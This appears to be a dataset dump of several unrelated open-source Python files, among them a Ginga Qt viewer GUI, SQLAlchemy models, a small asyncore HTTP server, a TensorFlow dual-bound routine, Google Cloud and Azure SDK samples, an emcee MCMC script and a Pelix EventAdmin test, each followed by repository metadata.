if picon:
w = Widgets.Button()
_w = w.get_widget()
_w.setIconSize(qsize)
_w.setIcon(picon)
else:
w = Widgets.Button(name)
elif wtyp == 'toggle':
if picon:
w = Widgets.ToggleButton()
_w = w.get_widget()
_w.setIconSize(qsize)
_w.setIcon(picon)
else:
w = Widgets.ToggleButton()
return w
def set_titlebar(self, text):
self.w.root.setWindowTitle("Ginga: %s" % text)
def build_readout(self):
readout = Readout.Readout(-1, 20)
# NOTE: Special hack for Mac OS X, otherwise the font on the readout
# is too small
macos_ver = platform.mac_ver()[0]
if len(macos_ver) > 0:
readout.set_font(self.font14)
else:
readout.set_font(self.font11)
return readout
def build_colorbar(self):
cbar = ColorBar.ColorBar(self.logger)
cbar.set_cmap(self.cm)
cbar.set_imap(self.im)
cbar.resize(700, 15)
#cbar.show()
self.colorbar = cbar
self.add_callback('active-image', self.change_cbar, cbar)
cbar.add_callback('motion', self.cbar_value_cb)
fr = QtGui.QFrame()
fr.setContentsMargins(0, 0, 0, 0)
layout = QtGui.QHBoxLayout()
fr.setLayout(layout)
layout.setContentsMargins(0, 0, 0, 0)
fr.setFrameStyle(QtGui.QFrame.Box | QtGui.QFrame.Raised)
layout.addWidget(cbar, stretch=1)
return fr
def build_viewpane(self, settings, rgbmap=None):
# instantiate bindings loaded with users preferences
bclass = ImageViewCanvasQt.ImageViewCanvas.bindingsClass
bindprefs = self.prefs.createCategory('bindings')
bd = bclass(self.logger, settings=bindprefs)
fi = ImageViewCanvasQt.ImageViewCanvas(logger=self.logger,
rgbmap=rgbmap,
settings=settings,
bindings=bd)
canvas = DrawingCanvas()
canvas.enable_draw(False)
fi.set_canvas(canvas)
fi.set_follow_focus(settings.get('follow_focus', True))
fi.enable_auto_orient(True)
fi.add_callback('motion', self.motion_cb)
fi.add_callback('cursor-down', self.force_focus_cb)
fi.add_callback('key-press', self.keypress)
fi.add_callback('drag-drop', self.dragdrop)
fi.ui_setActive(True)
for name in ['cuts']:
settings.getSetting(name).add_callback('set',
self.change_range_cb, fi, self.colorbar)
bd = fi.get_bindings()
bd.enable_all(True)
rgbmap = fi.get_rgbmap()
rgbmap.add_callback('changed', self.rgbmap_cb, fi)
fi.set_bg(0.2, 0.2, 0.2)
return fi
def add_viewer(self, name, settings,
use_readout=False, workspace=None):
vwidget = QtGui.QWidget()
vbox = QtGui.QVBoxLayout()
vbox.setContentsMargins(1, 1, 1, 1)
vbox.setSpacing(0)
vwidget.setLayout(vbox)
fi = self.build_viewpane(settings)
iw = fi.get_widget()
fi.add_callback('focus', self.focus_cb, name)
vbox.addWidget(iw, stretch=1)
fi.set_name(name)
if use_readout:
readout = self.build_readout()
# TEMP: hack
readout.fitsimage = fi
fi.add_callback('image-set', self.readout_config, readout)
self.add_callback('field-info', self.readout_cb, readout, name)
rw = readout.get_widget()
rw.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed,
QtGui.QSizePolicy.Fixed))
vbox.addWidget(rw, stretch=0, alignment=QtCore.Qt.AlignLeft)
else:
readout = None
# Add a page to the specified notebook
if not workspace:
workspace = 'channels'
self.ds.add_tab(workspace, vwidget, 1, name)
self.update_pending()
bnch = Bunch.Bunch(fitsimage=fi, view=iw, container=vwidget,
readout=readout, workspace=workspace)
return bnch
def gui_add_channel(self, chname=None):
if not chname:
self.chncnt += 1
chname = "Image%d" % self.chncnt
lbl = QtGui.QLabel('New channel name:')
ent = QtGui.QLineEdit()
ent.setText(chname)
lbl2 = QtGui.QLabel('Workspace:')
cbox = QtHelp.ComboBox()
names = self.ds.get_wsnames()
try:
idx = names.index(self._lastwsname)
except:
idx = 0
for name in names:
cbox.append_text(name)
cbox.setCurrentIndex(idx)
dialog = QtHelp.Dialog("Add Channel",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.add_channel_cb(w, rsp, ent, cbox, names))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(lbl, stretch=0)
layout.addWidget(ent, stretch=0)
layout.addWidget(lbl2, stretch=0)
layout.addWidget(cbox, stretch=0)
dialog.show()
def gui_add_channels(self):
captions = (('Prefix', 'entry'),
('Number', 'spinbutton'),
('Workspace', 'combobox'),
)
w, b = QtHelp.build_info(captions)
b.prefix.setText("Image")
b.number.setRange(1, 12)
b.number.setSingleStep(1)
b.number.setValue(1)
cbox = b.workspace
names = self.ds.get_wsnames()
try:
idx = names.index('channels')
except:
idx = 0
for name in names:
cbox.append_text(name)
cbox.setCurrentIndex(idx)
dialog = QtHelp.Dialog("Add Channels",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.add_channels_cb(w, rsp,
b, names))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(w, stretch=1)
dialog.show()
def gui_delete_channel(self):
chinfo = self.get_channelInfo()
chname = chinfo.name
lbl = QtGui.QLabel("Really delete channel '%s' ?" % (chname))
dialog = QtHelp.Dialog("Delete Channel",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.delete_channel_cb(w, rsp, chname))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(lbl, stretch=0)
dialog.show()
def gui_add_ws(self):
captions = (('Workspace name', 'entry'),
('Workspace type', 'combobox'),
('In workspace', 'combobox'),
('Channel prefix', 'entry'),
('Number of channels', 'spinbutton'),
('Share settings', 'entry'),
)
w, b = QtHelp.build_info(captions)
self.wscount += 1
wsname = "ws%d" % (self.wscount)
b.workspace_name.setText(wsname)
b.share_settings.setMaxLength(60)
cbox = b.workspace_type
cbox.append_text("Tabs")
cbox.append_text("Grid")
cbox.append_text("MDI")
cbox.setCurrentIndex(1)
cbox = b.in_workspace
names = self.ds.get_wsnames()
names.insert(0, 'top level')
try:
idx = names.index('channels')
except:
idx = 0
for name in names:
cbox.append_text(name)
cbox.setCurrentIndex(idx)
b.channel_prefix.setText("Image")
spnbtn = b.number_of_channels
spnbtn.setRange(0, 12)
spnbtn.setSingleStep(1)
spnbtn.setValue(4)
dialog = QtHelp.Dialog("Add Workspace",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.new_ws_cb(w, rsp, b, names))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(w, stretch=1)
dialog.show()
def new_ws_cb(self, w, rsp, b, names):
w.close()
wsname = str(b.workspace_name.text())
idx = b.workspace_type.currentIndex()
if rsp == 0:
return
d = { 0: 'nb', 1: 'grid', 2: 'mdi' }
wstype = d[idx]
idx = b.in_workspace.currentIndex()
inSpace = names[idx]
self.add_workspace(wsname, wstype, inSpace=inSpace)
chpfx = b.channel_prefix.text()
num = int(b.number_of_channels.value())
if num <= 0:
return
# Create a settings template to copy settings from
settings_template = self.prefs.getSettings('channel_Image')
name = "channel_template_%f" % (time.time())
settings = self.prefs.createCategory(name)
settings_template.copySettings(settings)
share_list = b.share_settings.text().split()
chbase = self.chncnt
self.chncnt += num
for i in range(num):
chname = "%s%d" % (chpfx, chbase+i)
self.add_channel(chname, workspace=wsname,
settings_template=settings_template,
settings_share=settings,
share_keylist=share_list)
return True
def gui_load_file(self, initialdir=None):
if self.filesel.exec_():
fileNames = list(map(str, list(self.filesel.selectedFiles())))
self.load_file(fileNames[0])
#self.start_operation_cb('FBrowser')
def statusMsg(self, format, *args):
if not format:
s = ''
else:
s = format % args
# remove message in about 10 seconds
self.w.status.showMessage(s, 10000)
def setPos(self, x, y):
self.w.root.move(x, y)
def setSize(self, wd, ht):
self.w.root.resize(wd, ht)
def setGeometry(self, geometry):
# Painful translation of X window geometry specification
# into correct calls to Qt
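        # Illustrative examples: '1200x800+30+50' resizes to 1200x800 and then
        # moves the window to (30, 50); '+200-150' only repositions it; a bare
        # '1200x800' only resizes it.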
coords = geometry.replace('+', ' +')
coords = coords.replace('-', ' -')
coords = coords.split()
if 'x' in coords[0]:
# spec includes dimensions
dim = coords[0]
coords = coords[1:]
else:
# spec is position only
dim = None
if dim is not None:
# user specified dimensions
dim = list(map(int, dim.split('x')))
self.setSize(*dim)
if len(coords) > 0:
# user specified position
coords = list(map(int, coords))
self.setPos(*coords)
def collapse_pane(self, side):
"""
Toggle collapsing the left or right panes.
"""
# TODO: this is too tied to one configuration, need to figure
# out how to generalize this
hsplit = self.w['hpnl']
sizes = hsplit.sizes()
lsize, msize, rsize = sizes
if self._lsize is None:
self._lsize, self._rsize = lsize, rsize
self.logger.debug("left=%d mid=%d right=%d" % (
lsize, msize, rsize))
if side == 'right':
if rsize < 10:
# restore pane
rsize = self._rsize
msize -= rsize
else:
# minimize pane
self._rsize = rsize
msize += rsize
rsize = 0
elif side == 'left':
if lsize < 10:
# restore pane
lsize = self._lsize
msize -= lsize
else:
# minimize pane
self._lsize = lsize
msize += lsize
lsize = 0
hsplit.setSizes((lsize, msize, rsize))
def getFont(self, fontType, pointSize):
fontFamily = self.settings.get(fontType)
font = QFont(fontFamily, pointSize)
return font
####################################################
# CALLBACKS
####################################################
def windowClose(self, *args):
"""Quit the application.
"""
self.quit()
def quit(self, *args):
"""Quit the application.
"""
self.logger.info("Attempting to shut down the application...")
self.stop()
root = self.w.root
self.w.root = None
while len(self.ds.toplevels) > 0:
w = self.ds.toplevels.pop()
w.deleteLater()
def channel_select_cb(self, index):
if index >= 0:
chname = self.channelNames[index]
self.logger.debug("Channel changed, index=%d chname=%s" % (
index, chname))
self.change_channel(chname)
def add_channel_cb(self, w, rsp, ent, cbox, names):
chname = str(ent.text())
idx = cbox.currentIndex()
wsname = names[idx]
w.close()
# save name for next add
self._lastwsname = wsname
if rsp == 0:
return
self.add_channel(chname, workspace=wsname)
return True
def add_channels_cb(self, w, rsp, b, names):
chpfx = b.prefix.text()
idx = b.workspace.currentIndex()
wsname = names[idx]
num = int(b.number.value())
w.close()
if (rsp == 0) or (num <= 0):
return
chbase = self.chncnt
self.chncnt += num
for i in range(num):
chname = "%s%d" % (chpfx, chbase+i)
self.add_channel(chname, workspace=wsname)
return True
def delete_channel_cb(self, w, rsp, chname):
w.close()
if rsp == 0:
return
self.delete_channel(chname)
return True
def invoke_op_cb(self):
menu = self.w.operation
menu.popup(self.w.opbtn.mapToGlobal(QtCore.QPoint(0,0)))
def start_operation_cb(self, name):
index = self.w.channel.currentIndex()
chname = str(self.w.channel.itemText(index))
return self.start_local_plugin(chname, name, None)
def tile_panes_cb(self):
self.w.mnb.tileSubWindows()
def cascade_panes_cb(self):
self.w.mnb.cascadeSubWindows()
def tabstoggle_cb(self, useTabs):
if useTabs:
self.w.mnb.setViewMode(QtGui.QMdiArea.TabbedView)
else:
self.w.mnb.setViewMode(QtGui.QMdiArea.SubWindowView)
def page_switch_cb(self, index):
self.logger.debug("index switched to %d" % (index))
if index >= 0:
container = self.w.mnb.widget(index)
self.logger.debug("container is %s" % (container))
# Find the channel that contains this widget
chnames = self.get_channelNames()
for chname in chnames:
chinfo = self.get_channelInfo(chname)
if 'container' in chinfo and (chinfo.container == container):
fitsimage = chinfo.fitsimage
if fitsimage != self.getfocus_fitsimage():
self.logger.debug("Active channel switch to '%s'" % (
chname))
self.change_channel(chname, raisew=False)
return True
def page_switch_mdi_cb(self, w):
if w is not None:
index = self.w.mnb.indexOf(w.widget())
return self.page_switch_cb(index)
# END
| bsd-3-clause | 8,010,920,929,081,022,000 | 32.14873 | 92 | 0.546691 | false |
mapgears/scribeui | scribeui_pyramid/modules/plugins/mapcache/models.py | 1 | 1215 | # -*- coding: utf-8 -*-
from scribeui_pyramid.modules.app.sqla import Base, BaseMixin
import sqlalchemy as sa
#from . import (
# DBSession,
# Base,
# BaseMixin
#)
class Job(Base, BaseMixin):
__tablename__ = 'jobs'
id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
title = sa.Column(sa.Unicode(255), nullable=False)
status = sa.Column(sa.Integer, nullable=False)
map_id = sa.Column(sa.Integer, sa.ForeignKey('maps.id'),
nullable=False)
def __repr__(self):
return u"<Job('{0}')>".format(self.title)
class DatabaseConfig(Base, BaseMixin):
__tablename__ = 'database_configs'
id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
name = sa.Column(sa.Unicode(255), nullable=False)
type = sa.Column(sa.Unicode())
host = sa.Column(sa.Unicode())
port = sa.Column(sa.Integer)
database_name = sa.Column(sa.Unicode())
user = sa.Column(sa.Unicode())
query = sa.Column(sa.Unicode())
workspace_id = sa.Column(sa.Integer, sa.ForeignKey('workspaces.id'),
nullable=False)
def __repr__(self):
return u"<DatabaseConfig('{0}')>".format(self.name)
| mit | -287,510,345,046,188,900 | 27.255814 | 72 | 0.61893 | false |
barneygale/mcocr | app/server.py | 1 | 2546 | import StringIO
import asyncore
import socket
import urlparse
import re
import settings as settings_herp
import os
import mimetypes
import time
import traceback
import docs
import http
mimetypes.init()
response_reasons = {
200: 'OK',
304: 'Not Modified',
404: 'Not Found',
500: 'Internal Server Error',
501: 'Not Implemented'}
handlers = {}
for name in dir(docs):
if name.endswith('Doc'):
handlers[re.compile(getattr(docs, name).expression)] = getattr(docs, name)
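# The handlers dict maps the compiled 'expression' regex of every class in the
# docs module whose name ends in 'Doc' to that class; handle_read() below
# matches the request path against these patterns and dispatches to the
# matching class's handle_request().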
class Server:
def __init__(self):
#Settings handler
self.settings = settings_herp.Settings()
try:
self.settings.load()
except:
self.settings.create()
def serve_forever(self):
self.client_dispatcher = self.ConnectionDispatcher(self.settings)
asyncore.loop(use_poll = False)
#######
#######
#Dispatches incoming connections to a new handler.
class ConnectionDispatcher(asyncore.dispatcher):
id = 0
current_id = 1
def __init__(self, settings):
asyncore.dispatcher.__init__(self)
self.settings = settings
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((settings['server_host'], settings['server_port']))
self.listen(settings['server_limit'])
def handle_accept(self):
pair = self.accept()
if pair is None:
pass
else:
sock, addr = pair
handler = Server.ConnectionHandler(sock)
handler.settings = self.settings
handler.id = self.current_id
self.current_id += 1
class ConnectionHandler(asyncore.dispatcher):
rbuff = ""
wbuff = ""
def handle_read(self):
self.rbuff += self.recv(self.settings['server_buffersize'])
try:
request = http.HTTPRequest()
request.decode(self.rbuff)
self.rbuff = ""
for i in handlers.iteritems():
m = i[0].match(request._data['path_path'])
if m:
i[1].handle_request(self, request, m.groupdict())
return
#Error state: no handlers recognise the URL!
err = http.HTTPResponse(responsecode=501)
print err.encode()
self.do_write(err.encode())
except http.BufferUnderflowException:
print "Waiting for more data..."
def do_write(self, data):
self.wbuff += data
def handle_write(self):
if self.wbuff:
sent = self.send(self.wbuff)
print "Wrote %d bytes" % sent
self.wbuff = self.wbuff[sent:]
if len(self.wbuff) == 0:
self.close()
def writable(self):
return len(self.wbuff) > 0
def handle_error(self):
err = http.HTTPResponse(responsecode=500, response=traceback.format_exc())
self.do_write(err.encode())
| bsd-3-clause | -3,733,676,247,853,530,600 | 23.018868 | 77 | 0.677141 | false |
google-research/google-research | caql/dual_method.py | 1 | 5310 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dual functions."""
import tensorflow.compat.v1 as tf
def get_I(l, u):
# l,u are None, n_layer tensors
# Ip: active relu units
# I: unstable relu units
Ip = tf.where(
tf.logical_and(tf.greater_equal(l, 0.), tf.greater(u, 0.)),
tf.ones_like(u), tf.zeros_like(u))
I = tf.where(
tf.logical_and(tf.greater(u, 0.), tf.less(l, 0.)), tf.ones_like(u),
tf.zeros_like(u))
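  # Illustrative example: with pre-activation bounds l = [-1., 0.5] and
  # u = [2., 3.], the first unit spans zero (l < 0 < u) so I = [1, 0], while
  # the second is always active (l >= 0, u > 0) so Ip = [0, 1].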
return Ip, I
def get_D(l, u, Ip, I):
# D matrix for each layer
D = Ip + tf.where(tf.greater(I, 0.5), tf.divide(u, u - l), tf.zeros_like(I))
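  # For a spanning (unstable) unit this is the slope u / (u - l) of the convex
  # ReLU relaxation (e.g. l = -1, u = 2 gives D = 2/3); always-active units
  # pass through with D = 1 and inactive units contribute D = 0.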
return D
def create_dual_approx(num_layers, batch_size, action_max, W_T_list, b_T_list,
action_tensor_center, return_full_info=False):
#layers_n: number of hidden units each layer
#W_T_list, b_T_list: multiplicatie and bias weights for each layer
#action_tensor_center: raw input, y: one-hot encoding of labels
# List of bounds (l_i,u_i) for i = 2,...,K-1
l_list = [tf.zeros_like(action_tensor_center)]
u_list = [tf.zeros_like(action_tensor_center)]
# List of transition matrices D_i for i = 2,...,K-1
D_list = [tf.zeros_like(action_tensor_center)]
# Indicators of spanning ReLu neurons for i = 2,...,K-1
I_list = [tf.zeros_like(action_tensor_center)]
# Indicators of active ReLu neurons for i = 2,...,K-1
Ip_list = [tf.zeros_like(action_tensor_center)]
# Final list of duals nu_i for i = 2,...,K-1
Nu_list = [tf.zeros([batch_size, W_T_list[0].get_shape().as_list()[1], 1])]
# Initialize Nu_K
Nu_K = -tf.expand_dims(-tf.eye(1), axis=-1)
# Final list of b_i'*nu_{i+1} for i = 1,...,K-1
gamma_list = [b_T_list[0]]
# Pre-compute bounds for layer 2
# Initialize Nu_hat_1
Nu_hat_1 = tf.tile(tf.expand_dims(W_T_list[0], axis=0), [batch_size, 1, 1])
# Initialize bounds
l_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] - action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
u_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] + action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
# Add to list (store in vector format)
l_list.append(l_2)
u_list.append(u_2)
# Recursion
for i in range(2, num_layers):
# form Ip, I
Ip_i, I_i = get_I(l_list[i - 1], u_list[i - 1])
I_list.append(I_i)
Ip_list.append(Ip_i)
# form D
D_i = get_D(l_list[i - 1], u_list[i - 1], Ip_i, I_i)
D_list.append(D_i)
# initialize nu_i
Nu_list.append(tf.einsum('ij,jk->ijk', D_i, W_T_list[i - 1]))
# initialize gamma_i
gamma_list.append(b_T_list[i - 1])
# if final iteration, update with Nu_K
if i == num_layers - 1:
Nu_K = tf.tile(Nu_K, [Nu_list[i - 1].get_shape().as_list()[0], 1, 1])
Nu_list[i - 1] = tf.einsum('ijk,ikm->ijm', Nu_list[i - 1], Nu_K)
gamma_list[i - 1] = tf.einsum('ij,ijm->im', gamma_list[i - 1], Nu_K)
# initialize next layer bounds
l_ip1 = tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(-Nu_list[i - 1]))
u_ip1 = -tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(Nu_list[i - 1]))
# update nu for layers i-1,...,2
for j in range(i - 1, 1, -1):
Nu_hat_j = tf.einsum('jk,ikm->ijm', W_T_list[j - 1], Nu_list[j])
Nu_list[j - 1] = tf.einsum('ij,ijk->ijk', D_list[j - 1], Nu_hat_j)
l_ip1 = tf.add(
l_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(-Nu_list[j - 1])))
u_ip1 = tf.subtract(
u_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(Nu_list[j - 1])))
# update nu_hat_1
Nu_hat_1 = tf.einsum('jk,ikm->ijm', W_T_list[0], Nu_list[1])
# start sum
psi = tf.einsum('ij,ijm->im', action_tensor_center,
Nu_hat_1) + gamma_list[i - 1]
# update gamma for layers 1,...,i-1
for j in range(1, i):
gamma_list[j - 1] = tf.einsum('ij,ijm->im', b_T_list[j - 1], Nu_list[j])
psi = tf.add(psi, gamma_list[j - 1])
Nu_hat_1_norm = tf.norm(Nu_hat_1, 1, axis=1, keepdims=False)
if i < num_layers - 1:
# finalize bounds
l_ip1 = tf.add(l_ip1, psi - action_max * Nu_hat_1_norm)
u_ip1 = tf.add(u_ip1, psi + action_max * Nu_hat_1_norm)
# add to list
l_list.append(l_ip1)
u_list.append(u_ip1)
else:
# compute J_tilde
J_tilde = -psi - action_max * Nu_hat_1_norm - u_ip1
if return_full_info:
return (-J_tilde, l_list, u_list, D_list, Nu_list, gamma_list, psi, l_ip1,
u_ip1, Nu_hat_1)
else:
return -J_tilde
| apache-2.0 | 5,858,996,064,217,988,000 | 31.181818 | 78 | 0.575706 | false |
googleapis/python-game-servers | samples/snippets/update_cluster.py | 1 | 2348 | #!/usr/bin/env python
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google Cloud Game Servers sample for updating a game server cluster.
Example usage:
python update_cluster.py --project-id <project-id> --location <location> --realm-id <realm-id> --cluster-id <cluster-id>
"""
import argparse
from google.cloud import gaming
from google.cloud.gaming_v1.types import game_server_clusters
from google.protobuf import field_mask_pb2 as field_mask
# [START cloud_game_servers_cluster_update]
def update_cluster(project_id, location, realm_id, cluster_id):
"""Updates a game server cluster."""
client = gaming.GameServerClustersServiceClient()
request = game_server_clusters.UpdateGameServerClusterRequest(
game_server_cluster=game_server_clusters.GameServerCluster(
name=f"projects/{project_id}/locations/{location}/realms/{realm_id}/gameServerClusters/{cluster_id}",
labels={"label-key-1": "label-value-1", "label-key-2": "label-value-2"},
),
update_mask=field_mask.FieldMask(paths=["labels"]),
)
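    # The field mask restricts the update to the listed fields, so only the
    # cluster's labels are modified here; all other cluster settings are left
    # untouched.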
operation = client.update_game_server_cluster(request)
print(f"Update cluster operation: {operation.operation.name}")
operation.result(timeout=120)
# [END cloud_game_servers_cluster_update]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--project-id', help='Your cloud project ID.', required=True)
parser.add_argument('--location', help='Your realm location.', required=True)
parser.add_argument('--realm-id', help='Your realm ID.', required=True)
parser.add_argument('--cluster-id', help='Your game server cluster ID.', required=True)
args = parser.parse_args()
update_cluster(args.project_id, args.location, args.realm_id, args.cluster_id)
| apache-2.0 | -2,334,753,272,189,716,500 | 38.79661 | 124 | 0.721039 | false |
mclaughlin6464/pearce | bin/optimization/cosmo_hyperparams_mcmc.py | 1 | 2197 | import emcee as mc
from pearce.emulator import OriginalRecipe, ExtraCrispy
from pearce.mocks import cat_dict
import numpy as np
from os import path
training_file = '/home/users/swmclau2/scratch/PearceRedMagicXiCosmo.hdf5'
a = 1.0
z = 1./a-1.0
fixed_params = {'z':z, 'r':24.06822623}
n_leaves, n_overlap = 10, 2
em_method = 'gp'
emu = OriginalRecipe(training_file, method = em_method, fixed_params=fixed_params, downsample_factor = 0.1)
# TODO downsample sampling?
def nll(p):
emu._emulator.set_parameter_vector(p)
ll = emu._emulator.lnlikelihood(emu.downsample_y, quiet=True)
return -ll if np.isfinite(ll) else 1e25
def lnprior(theta):
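    # Flat prior: every hyperparameter (presumably log-scaled) is confined to
    # [-15, 15]; outside that box the log-prior is -inf and emcee rejects the
    # proposed move via lnprob below.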
return -np.inf if np.any(np.logical_or(theta < -15, theta > 15)) else 0
def lnprob(theta, *args):
lp = lnprior(theta)
if not np.isfinite(lp):
return -np.inf
return lp - nll(theta, *args)
#p0 = emu._emulator.get_parameter_vector()
#p0 = np.array([ 0. , 10.6161248, 1.8339794, 7.342365 , 10.6371797,
# 2.2441632, 13.8155106, 11.3512804, 3.1795786, 4.6846614,
# 1. , 5.0188608, 3.7658774, -1.5383083])
p0 = np.array([-12.0550382, 0.1054246, 0.2661017, 5.6407612, 0.2408568, 1.1295944,
0.3643993, 11.5649985, 4.9071932, 4.7031938, 1., 11.7621938,
               10.6279446, 0., 10.6161248, 1.8339794, 7.342365, 10.6371797,
               2.2441632, 13.8155106, 11.3512804, 3.1795786, 4.6846614, 1.,
5.0188608, 3.7658774, -1.5383083])
nwalkers = 100
nsteps = 2000
nburn = 0
num_params = p0.shape[0]#len(emu.get_param_names())+1
pos0 = p0+np.random.randn(nwalkers, num_params)
ncores = 16
savedir = '/home/users/swmclau2/scratch/'
chain_fname = path.join(savedir, '%d_walkers_%d_steps_cosmo_hyperparams.npy'%(nwalkers, nsteps))
pnames = ['amp']
pnames.extend(emu.get_param_names())
with open(chain_fname, 'w') as f:
f.write('#' + '\t'.join(pnames)+'\t'+ '\t'.join(pnames)+'\tamp'+'\n')
sampler = mc.EnsembleSampler(nwalkers, num_params, lnprob, threads=ncores)
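# Incremental output: with storechain=False the sampler keeps no in-memory
# chain; each iteration below appends the current walker positions
# (nwalkers rows, one column per parameter) to the chain file instead.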
for result in sampler.sample(pos0, iterations = nsteps, storechain=False):
with open(chain_fname, 'a') as f:
np.savetxt(f, result[0])
| mit | 4,898,353,105,985,238,000 | 32.287879 | 107 | 0.646791 | false |
Azure/azure-sdk-for-python | sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/models/job_state_audit_record.py | 1 | 1805 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class JobStateAuditRecord(Model):
"""The Data Lake Analytics job state audit records for tracking the lifecycle
of a job.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar new_state: The new state the job is in.
:vartype new_state: str
:ivar time_stamp: The time stamp that the state change took place.
:vartype time_stamp: datetime
:ivar requested_by_user: The user who requests the change.
:vartype requested_by_user: str
:ivar details: The details of the audit log.
:vartype details: str
"""
_validation = {
'new_state': {'readonly': True},
'time_stamp': {'readonly': True},
'requested_by_user': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'new_state': {'key': 'newState', 'type': 'str'},
'time_stamp': {'key': 'timeStamp', 'type': 'iso-8601'},
'requested_by_user': {'key': 'requestedByUser', 'type': 'str'},
'details': {'key': 'details', 'type': 'str'},
}
def __init__(self, **kwargs):
super(JobStateAuditRecord, self).__init__(**kwargs)
self.new_state = None
self.time_stamp = None
self.requested_by_user = None
self.details = None
| mit | -5,939,820,053,492,980,000 | 34.392157 | 81 | 0.584488 | false |
tcalmant/ipopo | tests/shell/test_eventadmin.py | 1 | 5604 | #!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Tests the EventAdmin shell commands
:author: Thomas Calmant
"""
# Standard library
import threading
try:
import unittest2 as unittest
except ImportError:
import unittest
# Pelix
from pelix.ipopo.constants import use_ipopo
import pelix.framework
import pelix.services
import pelix.shell
# ------------------------------------------------------------------------------
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# ------------------------------------------------------------------------------
class DummyEventHandler(object):
"""
Dummy event handler
"""
def __init__(self):
"""
Sets up members
"""
# Topic of the last received event
self.last_event = None
self.last_props = {}
self.__event = threading.Event()
def handle_event(self, topic, properties):
"""
Handles an event received from EventAdmin
"""
# Keep received values
self.last_event = topic
self.last_props = properties
self.__event.set()
def pop_event(self):
"""
Pops the list of events
"""
# Clear the event for next try
self.__event.clear()
# Reset last event
event, self.last_event = self.last_event, None
return event
def wait(self, timeout):
"""
Waits for the event to be received
"""
self.__event.wait(timeout)
# ------------------------------------------------------------------------------
class EventAdminShellTest(unittest.TestCase):
"""
Tests the EventAdmin shell commands
"""
def setUp(self):
"""
Prepares a framework and a registers a service to export
"""
# Create the framework
self.framework = pelix.framework.create_framework(
('pelix.ipopo.core',
'pelix.shell.core',
'pelix.services.eventadmin',
'pelix.shell.eventadmin'))
self.framework.start()
# Get the Shell service
context = self.framework.get_bundle_context()
svc_ref = context.get_service_reference(pelix.shell.SERVICE_SHELL)
self.shell = context.get_service(svc_ref)
# Instantiate the EventAdmin component
context = self.framework.get_bundle_context()
with use_ipopo(context) as ipopo:
self.eventadmin = ipopo.instantiate(
pelix.services.FACTORY_EVENT_ADMIN,
"evtadmin", {})
def _register_handler(self, topics, evt_filter=None):
"""
Registers an event handler
:param topics: Event topics
:param evt_filter: Event filter
"""
svc = DummyEventHandler()
context = self.framework.get_bundle_context()
svc_reg = context.register_service(
pelix.services.SERVICE_EVENT_HANDLER, svc,
{pelix.services.PROP_EVENT_TOPICS: topics,
pelix.services.PROP_EVENT_FILTER: evt_filter})
return svc, svc_reg
def _run_command(self, command, *args):
"""
Runs the given shell command
"""
# Format command
if args:
command = command.format(*args)
# Run command
self.shell.execute(command)
def tearDown(self):
"""
Cleans up for next test
"""
# Stop the framework
pelix.framework.FrameworkFactory.delete_framework(self.framework)
self.framework = None
def testTopics(self):
"""
Tests sending topics
"""
# Prepare a handler
handler, _ = self._register_handler('/titi/*')
# Send events, with a matching topic
for topic in ('/titi/toto', '/titi/', '/titi/42', '/titi/toto/tata'):
self._run_command("send {0}", topic)
self.assertEqual(handler.pop_event(), topic)
# Send events, with a non-matching topic
for topic in ('/toto/titi/42', '/titi', '/toto/42'):
self._run_command("send {0}", topic)
self.assertEqual(handler.pop_event(), None)
def testFilters(self):
"""
Tests the sending events with properties
"""
# Prepare a handler
key = "some.key"
handler, _ = self._register_handler(None, '({0}=42)'.format(key))
